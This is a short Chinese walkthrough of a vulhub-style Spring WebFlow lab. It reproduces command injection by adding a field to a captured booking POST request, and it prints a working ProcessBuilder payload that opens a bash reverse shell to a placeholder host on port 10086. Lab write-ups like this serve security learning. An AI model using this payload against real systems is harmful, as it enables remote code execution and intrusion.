本文详细介绍了如何通过WebFlow环境构造漏洞,执行反弹Shell的操作。首先使用docker-compose启动服务,然后通过预设的账号登录系统,访问特定酒店ID并进行预订操作。在预订过程中,抓包并修改POST数据包,插入反弹Shell的POC,最终成功获取远程shell。此过程揭示了Web应用安全中的重要一环——权限滥用与命令注入。
首先进入漏洞环境
构造所需漏洞
docker-compose up -d
在浏览器中访问
首先访问http://your-ip:8080/login,用页面左边给出的任意一个账号/密码登录系统:
然后访问id为1的酒店http://your-ip:8080/hotels/1,点击预订按钮“Book Hotel”,填写相关信息后点击“Process”(从这一步,其实WebFlow就正式开始了):
再点击确认“Confirm”:
此时抓包,抓到一个POST数据包,我们向其中添加一个字段(也就是反弹shell的POC):
&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/x.x.x.x/10086+0>%261")).start()=vulhub 
成功执行,获得shell:
扫一扫
577
到【灌水乐园】发言
